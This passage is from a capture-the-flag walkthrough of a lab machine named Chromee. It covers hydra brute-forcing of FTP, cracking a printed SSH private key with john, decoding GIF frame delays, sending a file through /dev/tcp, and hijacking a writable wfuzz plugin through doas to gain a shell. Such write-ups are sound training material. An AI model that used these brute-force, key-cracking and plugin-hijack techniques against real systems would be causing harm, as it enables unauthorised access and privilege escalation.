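Run it, then `hydra -l adriana -P chromee.txt ftp://192.168.56.112:23333 -t 10` as above. Keep the list small and targeted: vsftpd's delay_failed_login (one second by default) makes a large list slow, so a few hundred well-chosen candidates is the practical budget.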
That gives a password; I guessed adriana as the username from the greeting in secret.php. Log in and look around: /home lists two users, follower and softly, and /srv holds a zeus.conf. It is written in doas.conf syntax (permit [options] identity [as target] cmd command, with a leading colon marking a group): follower may run /usr/local/bin/wfuzz as softly, and members of the softly group may run /usr/bin/chromium and /usr/bin/kill as root without a password (nopass).
ftp> cd home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49606|)
150 Here comes the directory listing.
drwxr-x--- 4 1000 1000 4096 Mar 09 07:59 follower
drwxr-x--- 3 1001 1001 4096 Mar 07 12:39 softly
226 Directory send OK.
lftp adriana@192.168.56.112:/srv> cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
The stock ftp client is painful (no cat), so connect with lftp instead. Besides dic.txt, the FTP root holds a hidden file literally named ...:
┌──(root㉿kali-plus)-[~]
└─# lftp 192.168.56.112 -u adriana -p 23333
Password:
lftp adriana@192.168.56.112:~> ls
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
lftp adriana@192.168.56.112:~> ls -al
drwxr-xr-x 2 106 115 4096 Mar 09 08:13 .
drwxr-xr-x 4 0 0 4096 Mar 09 08:12 ..
-rw-r--r-- 1 0 0 3414 Mar 09 08:13 ...
-rw-r--r-- 1 0 0 495 Mar 07 14:40 dic.txt
lftp adriana@192.168.56.112:~> cat ...
-----BEGIN OPENSSH PRIVATE KEY-----
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
SG3w==
-----END OPENSSH PRIVATE KEY-----
3414 bytes transferred
It is a passphrase-protected OpenSSH private key (the base64 header decodes to openssh-key-v1 with aes256-ctr and bcrypt, which john's cost output confirms). Save it locally as id3, convert it to a john hash with ssh2john (ssh2john id3 > tmp) and run the passphrase against rockyou:
┌──(root㉿kali-plus)-[~]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cassandra (id3)
1g 0:00:00:10 DONE (2025-03-28 22:01) 0.09680g/s 99.12p/s 99.12c/s 99.12C/s hawaii..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali-plus)-[~]
└─# john tmp --show
id3:cassandra
1 password hash cracked, 0 left
The passphrase is cassandra. Only two usernames are known, follower and softly, so try the key with each and see which one it belongs to:
┌──(root㉿kali-plus)-[~]
└─# ssh follower@192.168.56.112 -i id3
Enter passphrase for key 'id3':
follower@Chromee:~$ ls
cat.gif note.txt
follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets.
47 is not just a number, it's a twist of fate.
There is another hint in note.txt, plus a GIF. Pull the image back to Kali with nc: start the listener on Kali first, then push the file from the target with bash's /dev/tcp redirection (since we hold an SSH key, scp -i id3 follower@192.168.56.112:cat.gif . would do the same job more reliably).
# on Kali (192.168.56.101), listen first
nc -lp 1234 > cat.gif
# on the target, as follower
cat cat.gif > /dev/tcp/192.168.56.101/1234
Since it is a GIF, the first idea is to split it into frames, but frame extraction turns up nothing. Look at the metadata instead:
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# exiftool cat.gif
ExifTool Version Number : 12.76
File Name : cat.gif
Directory : .
File Size : 3.5 MB
File Modification Date/Time : 2025:03:28 22:23:24+08:00
File Access Date/Time : 2025:03:28 22:24:09+08:00
File Inode Change Date/Time : 2025:03:28 22:23:24+08:00
File Permissions : -rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 640
Image Height : 640
Has Color Map : Yes
Color Resolution Depth : 8
Bits Per Pixel : 8
Background Color : 0
Animation Iterations : Infinite
Comment : Imagemagick Convert Timeline
Profile CMM Type :
Profile Version : 4.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2016:01:01 00:00:00
Profile File Signature : acsp
Primary Platform : Unknown ()
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator :
Profile ID : 0
Profile Description : sRGB
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Media White Point : 0.9642 1 0.82491
Red Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract)
Profile Copyright : Google Inc. 2016
Frame Count : 13
Duration : 6.31 s
Image Size : 640x640
Megapixels : 0.410
The Comment field, Imagemagick Convert Timeline, is the clue. A search for it turns up a writeup on hiding data in GIF frame timing (https://www.cnblogs.com/chtxrt/p/17280677.html). Analyse the frames with ImageMagick's identify first:
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# identify cat.gif
cat.gif[0] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[1] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.004
cat.gif[2] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[3] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[4] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[5] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[6] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[7] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.003
cat.gif[8] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.010u 0:00.002
cat.gif[9] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.000u 0:00.002
cat.gif[10] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.000u 0:00.002
cat.gif[11] GIF 640x640 640x640+0+0 8-bit sRGB 256c 0.000u 0:00.002
cat.gif[12] GIF 640x640 640x640+0+0 8-bit sRGB 256c 3.33064MiB 0.000u 0:00.002
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# identify -format "%s %T \n" cat.gif
0 65
1 98
2 65
3 100
4 102
5 98
6 67
7 6
8 6
9 6
10 6
11 6
12 6
┌──(root㉿kali-plus)-[~/hmv/chromee]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6
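The delays above decode to the password without ImageMagick, as the following added Python example shows; it is not code from the writeup. It reads the delay field of every Graphic Control Extension straight out of the GIF (the value identify prints as %T, in hundredths of a second), keeps the printable ones as ASCII and applies ROT47 per the "47" hint. PAGE_DELAYS is the list identify printed for cat.gif; the GIF produced by build_gif() is a constructed 1x1 stand-in so the parser can be exercised without the real file.

```python
# Added example: extract GIF frame delays (GCE blocks) and decode them as
# ASCII + ROT47. PAGE_DELAYS is from the identify output on the page; the
# GIF built here is a constructed stand-in, not the real cat.gif.
import struct

PAGE_DELAYS = [65, 98, 65, 100, 102, 98, 67, 6, 6, 6, 6, 6, 6]


def _skip_subblocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks ending in 0x00."""
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def gif_frame_delays(data):
    """Return the delay (centiseconds) of every Graphic Control Extension, in order."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    pos = 6
    _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, pos)
    pos += 7
    if packed & 0x80:                            # global colour table present
        pos += 3 * (2 << (packed & 0x07))        # 3 bytes per entry, 2^(N+1) entries
    delays = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                        # trailer
            break
        if block == 0x21:                        # extension block
            label = data[pos]
            pos += 1
            if label == 0xF9:                    # GCE: size(4), packed, delay u16 LE, transparent index
                delays.append(struct.unpack_from("<H", data, pos + 2)[0])
            pos = _skip_subblocks(data, pos)
        elif block == 0x2C:                      # image descriptor
            _x, _y, _iw, _ih, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if ipacked & 0x80:                   # local colour table present
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1                             # LZW minimum code size
            pos = _skip_subblocks(data, pos)     # compressed image data
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return delays


def rot47(text):
    """ROT47 over printable ASCII 33..126; other characters pass through unchanged."""
    return "".join(chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c
                   for c in text)


def decode_delays(delays):
    """Keep delays in the printable ASCII range, then apply ROT47 (the '47' hint)."""
    raw = "".join(chr(d) for d in delays if 32 <= d <= 126)
    return raw, rot47(raw)


def build_gif(delays):
    """Constructed 1x1 GIF89a with one frame per delay; image data is a dummy LZW block."""
    out = bytearray(b"GIF89a")
    out += struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)           # 1x1, global table of 2 colours
    out += b"\x00\x00\x00\xff\xff\xff"                       # the 2 colour entries
    for d in delays:
        out += b"\x21\xf9\x04\x00" + struct.pack("<H", d) + b"\x00\x00"   # GCE
        out += b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)            # image descriptor
        out += b"\x02\x02\x44\x01\x00"                       # min code size 2, one sub-block, terminator
    out += b"\x3b"
    return bytes(out)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_gif(PAGE_DELAYS)
    raw, decoded = decode_delays(gif_frame_delays(data))
    print("delays as ASCII:", raw, "-> ROT47:", decoded)
```

Run it with the real file as `python3 gifdelays.py cat.gif`; without an argument it decodes the constructed stand-in. ROT47 is its own inverse, so the same function encodes as well as decodes.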
Only the delays matter here (%T is the frame delay in hundredths of a second). The first seven values, 65 98 65 100 102 98 67, are printable ASCII and spell AbAdfbC; the note's hint about 47 suggests ROT47, which turns that into p3p573r. This password is follower's own, not softly's: the rule permit follower as softly cmd /usr/local/bin/wfuzz has no nopass, so doas will ask for follower's password before running wfuzz as softly. The next step is to locate the wfuzz installation and check whether any of its files is writable:
follower@Chromee:~$ cat /usr/local/bin/wfuzz
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from wfuzz.wfuzz import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
follower@Chromee:~$ find / -name wfuzz 2>/dev/null
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz
follower@Chromee:~$ /usr/local/lib/python3.9/dist-packages/wfuzz
-bash: /usr/local/lib/python3.9/dist-packages/wfuzz: Es un directorio
follower@Chromee:~$ cd /usr/local/lib/python3.9/dist-packages/wfuzz
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ ls -al
total 204
drwxr-xr-x 10 root root 4096 mar 7 10:57 .
drwxr-xr-x 6 root root 4096 mar 7 10:57 ..
-rw-r--r-- 1 root root 38827 mar 7 10:57 advanced.rst
-rw-r--r-- 1 root root 722 mar 7 10:57 api.py
-rw-r--r-- 1 root root 4251 mar 7 10:57 core.py
-rw-r--r-- 1 root root 4718 mar 7 10:57 dictionaries.py
-rw-r--r-- 1 root root 820 mar 7 10:57 exception.py
drwxr-xr-x 6 root root 4096 mar 7 10:57 externals
-rw-r--r-- 1 root root 3285 mar 7 10:57 facade.py
drwxr-xr-x 3 root root 4096 mar 7 10:57 factories
drwxr-xr-x 3 root root 4096 mar 7 10:57 filters
-rw-r--r-- 1 root root 11996 mar 7 10:57 fuzzobjects.py
-rw-r--r-- 1 root root 14220 mar 7 10:57 fuzzqueues.py
-rw-r--r-- 1 root root 11147 mar 7 10:57 fuzzrequest.py
drwxr-xr-x 3 root root 4096 mar 7 10:57 helpers
-rw-r--r-- 1 root root 1667 mar 7 10:57 __init__.py
-rw-r--r-- 1 root root 32 mar 7 10:57 __main__.py
-rw-r--r-- 1 root root 1481 mar 7 10:57 mixins.py
-rw-r--r-- 1 root root 8028 mar 7 10:57 myhttp.py
-rw-r--r-- 1 root root 9891 mar 7 10:57 myqueues.py
-rw-r--r-- 1 root root 12920 mar 7 10:57 options.py
drwxr-xr-x 3 root root 4096 mar 7 10:57 plugin_api
drwxr-xr-x 8 root root 4096 mar 7 10:57 plugins
drwxr-xr-x 2 root root 4096 mar 7 10:57 __pycache__
drwxr-xr-x 5 root root 4096 mar 7 10:57 ui
-rw-r--r-- 1 root root 6755 mar 7 10:57 wfuzz.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find . -writeable
find: predicado desconocido `-writeable'
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find . -writable
./plugins/payloads/file.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")
file.py is writable, and it already holds a pty.spawn payload that the box author apparently forgot to remove. wfuzz's -w option selects the file payload, so whatever Python sits in plugins/payloads/file.py is imported and executed whenever wfuzz is run with a wordlist. Overwrite it with our own payload, then launch wfuzz through doas, which runs a command as another user according to the rules we saw (-u softly selects the target user); the password prompt asks for follower's password, p3p573r:
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ echo 'import os;os.system("/bin/bash")' > ./plugins/payloads/file.py
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import os;os.system("/bin/bash")
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cd ~
follower@Chromee:~$ doas -u softly /usr/local/bin/wfuzz -w /etc/passwd -u .
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@Chromee:/home/follower$
That gives a shell as softly, and the user flag is in softly's home directory:
softly@Chromee:/home/follower$ cd ..
softly@Chromee:/home$ cd ..
softly@Chromee:/$ ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
softly@Chromee:/$ cd home
softly@Chromee:/home$ ls
follower softly
softly@Chromee:/home$ cd softly
softly@Chromee:~$ ls
user.txt
softly@Chromee:~$ cat user.txt
flag{c5dbe81aac6438c522d2f79cc7255e6a}
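Before moving on to root, the zeus.conf rules deserve a second look as a configuration lesson. The fragment below is an added illustration, not a file from the machine: the three rules as found, followed by a tightened version in doas.conf syntax (permit|deny [options] identity [as target] [cmd command [args ...]], where a leading colon marks a group and the last matching rule wins). The wordlist path and the policy choices in the tightened part are assumptions.

```text
# As found in /srv/zeus.conf (copied from the listing above)
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill

# Tightened version (assumed policy, for illustration only)
# 1. Pin the arguments: with no 'args' clause doas accepts any argument list,
#    so -w could point the file payload plugin at anything.
permit follower as softly cmd /usr/local/bin/wfuzz args -w /opt/wordlists/common.txt -u http://127.0.0.1/FUZZ
# 2. A browser is never a safe root command: headless chromium reads any
#    file:// URL as root. Deny the escalation; run it as the user who needs it.
deny :softly as root cmd /usr/bin/chromium
# 3. If root kill is really needed, keep the password prompt and the syslog
#    entry (drop nopass; doas logs every use unless nolog is set).
permit :softly as root cmd /usr/bin/kill
```

The args clause only narrows what doas will launch; it cannot compensate for a world-writable file on wfuzz's import path. The real fix for the first rule is restoring root-owned 0644 permissions on plugins/payloads/file.py, since any Python there runs as the target user regardless of the arguments. The chromium rule is the bigger hole and is exactly what the next section abuses.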
Privilege escalation: root flag
Bring pspy64 over and watch for scheduled jobs:
softly@Chromee:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/03/28 16:36:41 CMD: UID=0 PID=9 |
2025/03/28 16:36:41 CMD: UID=0 PID=8 |
2025/03/28 16:36:41 CMD: UID=0 PID=66 |
2025/03/28 16:36:41 CMD: UID=0 PID=65 |
2025/03/28 16:36:41 CMD: UID=0 PID=62 |
2025/03/28 16:36:41 CMD: UID=0 PID=6 |
2025/03/28 16:36:41 CMD: UID=1000 PID=587 | /usr/sbin/apache2 -k start
2025/03/28 16:36:41 CMD: UID=1000 PID=586 | /usr/sbin/apache2 -k start
2025/03/28 16:36:41 CMD: UID=1001 PID=5205 | ./pspy64
2025/03/28 16:36:41 CMD: UID=0 PID=5202 |
2025/03/28 16:36:41 CMD: UID=0 PID=52 |
2025/03/28 16:36:41 CMD: UID=0 PID=5158 |
2025/03/28 16:36:41 CMD: UID=0 PID=5157 |
2025/03/28 16:36:41 CMD: UID=0 PID=5109 |
2025/03/28 16:36:41 CMD: UID=0 PID=51 |
2025/03/28 16:36:41 CMD: UID=0 PID=5033 |
2025/03/28 16:36:41 CMD: UID=1000 PID=500 | php-fpm: pool www
2025/03/28 16:36:41 CMD: UID=0 PID=50 |
2025/03/28 16:36:41 CMD: UID=1000 PID=499 | php-fpm: pool www
2025/03/28 16:36:41 CMD: UID=1000 PID=496 | nginx: worker process
2025/03/28 16:36:41 CMD: UID=0 PID=494 | nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
2025/03/28 16:36:41 CMD: UID=0 PID=49 |
2025/03/28 16:36:41 CMD: UID=0 PID=4820 |
2025/03/28 16:36:41 CMD: UID=1001 PID=4804 | /bin/bash
2025/03/28 16:36:41 CMD: UID=1001 PID=4803 | sh -c /bin/bash
2025/03/28 16:36:41 CMD: UID=1001 PID=4802 | /usr/bin/python3 /usr/local/bin/wfuzz -w /etc/passwd -u .
2025/03/28 16:36:41 CMD: UID=0 PID=48 |
2025/03/28 16:36:41 CMD: UID=0 PID=47 |
2025/03/28 16:36:41 CMD: UID=0 PID=46 |
2025/03/28 16:36:41 CMD: UID=0 PID=4527 |
2025/03/28 16:36:41 CMD: UID=0 PID=45 |
2025/03/28 16:36:41 CMD: UID=0 PID=44 |
2025/03/28 16:36:41 CMD: UID=0 PID=43 |
2025/03/28 16:36:41 CMD: UID=0 PID=429 | /usr/sbin/apache2 -k start
2025/03/28 16:36:41 CMD: UID=0 PID=407 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2025/03/28 16:36:41 CMD: UID=0 PID=4 |
2025/03/28 16:36:41 CMD: UID=1000 PID=3757 | -bash
2025/03/28 16:36:41 CMD: UID=1000 PID=3756 | sshd: follower@pts/0
2025/03/28 16:36:41 CMD: UID=1000 PID=3739 | (sd-pam)
2025/03/28 16:36:41 CMD: UID=1000 PID=3738 | /lib/systemd/systemd --user
2025/03/28 16:36:41 CMD: UID=0 PID=3735 | sshd: follower [priv]
2025/03/28 16:36:41 CMD: UID=0 PID=368 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/03/28 16:36:41 CMD: UID=0 PID=360 | /usr/sbin/vsftpd /etc/vsftpd.conf
2025/03/28 16:36:41 CMD: UID=0 PID=340 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
2025/03/28 16:36:41 CMD: UID=0 PID=302 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2025/03/28 16:36:41 CMD: UID=0 PID=3 |
2025/03/28 16:36:41 CMD: UID=0 PID=298 | /lib/systemd/systemd-logind
2025/03/28 16:36:41 CMD: UID=0 PID=296 | /usr/sbin/rsyslogd -n -iNONE
2025/03/28 16:36:41 CMD: UID=0 PID=288 |
2025/03/28 16:36:41 CMD: UID=0 PID=286 |
2025/03/28 16:36:41 CMD: UID=0 PID=282 |
2025/03/28 16:36:41 CMD: UID=0 PID=278 |
2025/03/28 16:36:41 CMD: UID=103 PID=274 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/03/28 16:36:41 CMD: UID=0 PID=273 | /usr/sbin/cron -f
2025/03/28 16:36:41 CMD: UID=0 PID=272 |
2025/03/28 16:36:41 CMD: UID=0 PID=269 |
2025/03/28 16:36:41 CMD: UID=0 PID=265 |
2025/03/28 16:36:41 CMD: UID=0 PID=261 |
2025/03/28 16:36:41 CMD: UID=0 PID=257 |
2025/03/28 16:36:41 CMD: UID=0 PID=252 |
2025/03/28 16:36:41 CMD: UID=0 PID=25 |
2025/03/28 16:36:41 CMD: UID=0 PID=244 |
2025/03/28 16:36:41 CMD: UID=0 PID=24 |
2025/03/28 16:36:41 CMD: UID=0 PID=23 |
2025/03/28 16:36:41 CMD: UID=104 PID=228 | /lib/systemd/systemd-timesyncd
2025/03/28 16:36:41 CMD: UID=0 PID=22 |
2025/03/28 16:36:41 CMD: UID=0 PID=21 |
2025/03/28 16:36:41 CMD: UID=0 PID=207 | /lib/systemd/systemd-udevd
2025/03/28 16:36:41 CMD: UID=0 PID=20 |
2025/03/28 16:36:41 CMD: UID=0 PID=2 |
2025/03/28 16:36:41 CMD: UID=0 PID=19 |
2025/03/28 16:36:41 CMD: UID=0 PID=182 | /lib/systemd/systemd-journald
2025/03/28 16:36:41 CMD: UID=0 PID=18 |
2025/03/28 16:36:41 CMD: UID=0 PID=17 |
2025/03/28 16:36:41 CMD: UID=0 PID=15 |
2025/03/28 16:36:41 CMD: UID=0 PID=148 |
2025/03/28 16:36:41 CMD: UID=0 PID=147 |
2025/03/28 16:36:41 CMD: UID=0 PID=13 |
2025/03/28 16:36:41 CMD: UID=0 PID=12 |
2025/03/28 16:36:41 CMD: UID=0 PID=110 |
2025/03/28 16:36:41 CMD: UID=0 PID=11 |
2025/03/28 16:36:41 CMD: UID=0 PID=109 |
2025/03/28 16:36:41 CMD: UID=0 PID=108 |
2025/03/28 16:36:41 CMD: UID=0 PID=107 |
2025/03/28 16:36:41 CMD: UID=0 PID=106 |
2025/03/28 16:36:41 CMD: UID=0 PID=105 |
